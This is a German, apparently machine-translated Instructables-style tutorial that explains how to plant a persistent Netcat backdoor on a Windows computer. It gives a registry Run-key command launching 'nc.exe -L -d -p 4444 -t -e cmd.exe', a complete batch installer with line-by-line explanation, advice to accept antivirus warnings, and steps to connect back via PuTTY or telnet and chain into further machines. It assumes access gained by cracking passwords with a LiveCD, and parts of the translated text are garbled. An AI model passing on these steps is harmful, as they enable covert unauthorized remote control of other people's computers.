Inhaltsverzeichnis:
- Schritt 1: Netcat herunterladen
- Schritt 2: Mit Nc.bat
- Schritt 3: Ohne Nc.bat
- Schritt 4: Zurück in
- Schritt 5: Quellcode
Video: Netcat Fun! - Gunook
2024 Autor: John Day | [email protected]. Zuletzt bearbeitet: 2024-01-30 07:21
Dieses anweisbare zeigt Ihnen, wie Sie eine Hintertür auf einem Computer mit Netcat erstellen! Ich zeige Ihnen zwei Möglichkeiten, dies mit und ohne meine Batch-Datei zu tun, die es für Sie automatisiert. Dieses instructable geht bereits davon aus, dass Sie bereits Root-Berechtigungen auf dem Computer haben, wahrscheinlich mit einer 0phcrack LiveCD hier. Jetzt auf das instructable.
Schritt 1: Netcat herunterladen
Ich habe Ihnen die Mühe von 3 Minuten der Suche bei Google erspart und nc.exe auf Instructables für Sie zum Download gestellt. Optional können Sie auch nc.bat herunterladen, eine Batch-Datei, die ich erstellt habe, um den Prozess für Sie zu automatisieren. Stellen Sie sicher, dass beim Herunterladen von nc.bat 464 Bytes groß sind, da ich weiterhin Versionen hochgeladen habe und festgestellt habe, dass etwas nicht stimmt. Wenn es nicht 464 Bytes sind, entspricht das Programm nicht diesem instructable.
Schritt 2: Mit Nc.bat
Zunächst müssen sich beide Dateien im selben Verzeichnis befinden, damit nc.bat richtig funktioniert. Ich schlage vor, für diesen Vorgang ein Flash-Laufwerk oder eine CD-ROM zu verwenden. Ich habe dafür ein 512 MB Geek-Squad-Flash-Laufwerk verwendet, aber das ist nur ich. Kopieren Sie also die Dateien auf Ihr externes Mediengerät und bringen Sie sie auf den Computer, auf dem Sie Root haben. Steigen Sie auf das Mediengerät und doppelklicken Sie auf nc.bat. Dadurch wird die Datei nc.exe in den Ordner system32 im Stammverzeichnis des Systems (normalerweise C:\Windows oder C:\WINNT) kopiert und die erforderlichen Änderungen an der Registrierung vorgenommen. Dann notieren Sie sich die IP-Adresse. Es wird so etwas wie '192.168.1.103' sein, was mir gehört. Sobald dies erledigt ist, starten Sie den Computer neu und melden Sie sich an. Dann fragt Sie das Antivirenprogramm möglicherweise, ob Sie das Programm zulassen/verbieten möchten. Klicken Sie auf „Zulassen“oder ähnliches. Denken Sie daran, dass Sie in diesem anweisbaren nur aus dem lokalen Netzwerk dieses Computers telnet können. Dann gehen oder abmelden oder was immer Sie wollen.
Schritt 3: Ohne Nc.bat
Dazu muss nc.exe auf einer CD oder einem Flash-Laufwerk vorhanden sein. Gehen Sie zum Computer, melden Sie sich an und schließen Sie das Flash-Laufwerk an oder legen Sie Ihre CD ein. Von hier aus gibt es zwei Möglichkeiten: Die aufpolierte grafische Benutzeroberfläche von Windows oder die schmutzige, altmodische Art der Eingabeaufforderung. Die schmutzige, altmodische Eingabeaufforderung: Rufen Sie die Eingabeaufforderung auf, indem Sie zu StartRun gehen und geben Sie ein:
cmd.exeNavigieren Sie zum Flash- oder CD-Laufwerk. Wenn Sie nicht wissen, welches Laufwerk welches ist, klicken Sie mit der rechten Maustaste auf die Startschaltfläche und klicken Sie auf Durchsuchen. Klicken Sie im Arbeitsplatz auf alle nicht lokalen Laufwerke, bis Sie zu Ihrem Flash-/CD-Laufwerk gelangen. Merken Sie sich den Laufwerksbuchstaben und kehren Sie zur Eingabeaufforderung zurück. Geben Sie den Laufwerksbuchstaben gefolgt von einem Doppelpunkt wie folgt ein: K: Geben Sie dann eine Zeile nach der anderen ein und drücken Sie dann die Eingabetaste
nc.exe %systemroot%\system32\nc.exereg kopieren HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 - t -e cmd.exe"Das war so ziemlich die Installation. Alles, was Sie jetzt wissen müssen, ist die lokale IP-Adresse, die Sie leicht finden können, indem Sie den Befehl 'ipconfig' eingeben und in der Tabelle nach etwas wie "192.168.1.103" suchen. Starten Sie dann den Computer neu und melden Sie sich wieder an. Das Antivirenprogramm fragt Sie möglicherweise, ob Sie dies zulassen/verbieten möchten. Klicken Sie auf Zulassen. Dann können Sie mit dem Computer tun, was Sie wollen. Klicken Sie im Arbeitsplatz auf alle nicht lokalen Laufwerke, bis Sie zu Ihrem Flash-/CD-Laufwerk gelangen. Klicken Sie dann mit der rechten Maustaste auf nc.exe und kopieren Sie. Gehen Sie dann zum Laufwerk C und klicken Sie auf den Ordner Windows oder WINNT. Gehen Sie dann in den Ordner system32 und fügen Sie nc.exe ein. Schließen Sie das und gehen Sie zu StartRun. Geben Sie regedit ein. Navigieren Sie durch die Ordner zu: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Dann klicken Sie mit der rechten Maustaste auf eine leere Stelle und gehen Sie zu NewString Value. Geben Sie für den Namen ein, was Sie wollen, aber für den Wert geben Sie ein
%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exeDas war so ziemlich die Installation. Alles, was Sie jetzt wissen müssen, ist die lokale IP-Adresse, die Sie leicht finden können, indem Sie den Befehl 'ipconfig' in die Eingabeaufforderung (StartRun:cmd.exe) eingeben und in der Tabelle nach etwas wie "192.168.1.103" suchen. Starten Sie dann den Computer neu und melden Sie sich wieder an. Das Antivirenprogramm fragt Sie möglicherweise, ob Sie dies zulassen/verbieten möchten. Klicken Sie auf Zulassen. Dann können Sie mit dem Computer machen, was Sie wollen.
Schritt 4: Zurück in
Sobald Sie es installiert haben und die Kontrolle über den Host übernehmen möchten, öffnen Sie die Eingabeaufforderung oder PuTTY. Ich finde PuTTY großartig, also lasse ich es hier herunterladen. Using PuTTYHerunterladen und öffnen Sie PuTTY.exe. Klicken Sie auf das 'rohe' Protokoll. Geben Sie in das Textfeld Port # 4444 ein. Geben Sie in das Feld 'Hostadresse' die IP-Adresse ein, die Sie sich während der Installation notiert haben. Drücken Sie dann die Eingabetaste. PuTTY sollte sich mit der Box verbinden und Sie erhalten eine Eingabeaufforderung. Verwenden Sie die Eingabeaufforderung. Öffnen Sie die Eingabeaufforderung und geben Sie 'telnet 4444' ein. Drücken Sie dann die Eingabetaste, und Sie sollten eine Eingabeaufforderung erhalten. Auf diese Weise können Sie fast alles, was Sie möchten, mit dem Computer aus der Ferne tun, was Sie mit einem lokalen Konto tun können. Es beginnt wirklich interessant zu werden, wenn Sie in einen Computer gehen und dann von diesem Computer aus in einen anderen Computer, um eine ganze Kette von Computern miteinander zu verbinden. Viel Spaß (legal)!
Schritt 5: Quellcode
Da ich gefragt wurde, werde ich den Quellcode (für die Batch-Datei) bereitstellen und jeden Befehl und seine Funktion erklären. Sei vorsichtig! Dies ist die aktuelle Version des Batch-Installationsprogramms. Wenn Ihr Code anders ist, unterscheidet sich der Code.
@echo offcopy nc.exe %systemroot%\system32\nc.exeif errorlevel 0 goto regeditgoto error:regeditreg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc. exe -L -d -p 4444 -t -e cmd.exe"if errorlevel 0 goto ip:errorecho etwas Unerwartetes ist aufgetreten und das Programm muss beendet werden.goto end:ipecho notieren Sie die IP-Adresse aus der Tabelleipconfig:endecho end. Echo-Klebeband raus. Pause@echo off - Weist es an, die Befehle beim Ausführen nicht anzuzeigen. nc.exe %systemroot%\system32\nc.exe kopieren - kopiert normalerweise netcat nach C:\WINDOWS\system32. Dies macht es so, dass Sie beim Zurückgehen, anstatt ständig Verzeichnisse zu wechseln, einfach "nc" eingeben können, um einen anderen Port zu öffnen. if errorlevel 0 gotto regedit-error checking. Wenn das Kopieren erfolgreich war, Es geht weiter, um den Registry.goto-Fehler zu bearbeiten. Wenn ein Fehler aufgetreten ist, gehen Sie zum:error label.:regedit-A-Label und geben Sie an, dass wenn das Programm "goto regedit" sagt, hierher.reg fügen Sie HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exe"-(angeblich eine Zeile sein), die den Registrierungsschlüssel hinzufügt, um das Programm beim Neustart neu zu starten. /f bedeutet existierenden Schlüssel überschreiben, /v für Schlüsselname, /d für Daten. Der Rest der Tags wird für netcat eingegeben. -L sagt, es soll beim Beenden neu gestartet werden, damit Sie nicht auf den Neustart des Computers warten müssen. -d Ich habe es vergessen. -p 4444 gibt die Portnummer an. -t Ich habe es vergessen. -e cmd.exe lässt die Eingabeaufforderung bei Remote-Verbindung starten.if errorlevel 0 goto ip-error testing. Wenn der Lauf schief gelaufen ist, wird diese Zeile übersprungen und zum:Error label.echo zurückgesprungen. Etwas Unerwartetes ist aufgetreten, und das Programm muss beendet werden " auf dem screen.goto end-wenn es zur Fehlermeldung ging, ist etwas schief gelaufen und das Programm muss sowieso geschlossen werden.:ip-Noch einmal label.echo die IP-Adresse aus der Tabelle notieren-Schreibt "die IP aufschreiben Adresse aus der Tabelle" in die screen.ipconfig- Dies ist ein Befehl, der Informationen über die Einstellungen Ihres lokalen Netzwerks (LAN) druckt.:end-Label.echo end.-schreibt "end" auf das screen.echo Klebeband. -schreibt "Klebeband heraus" auf den Bildschirm.pause-dieser Befehl hält das Programm an und wartet darauf, dass der Benutzer eine Taste drückt. In diesem Programm wartet es auf Eingaben und beendet dann das Programm.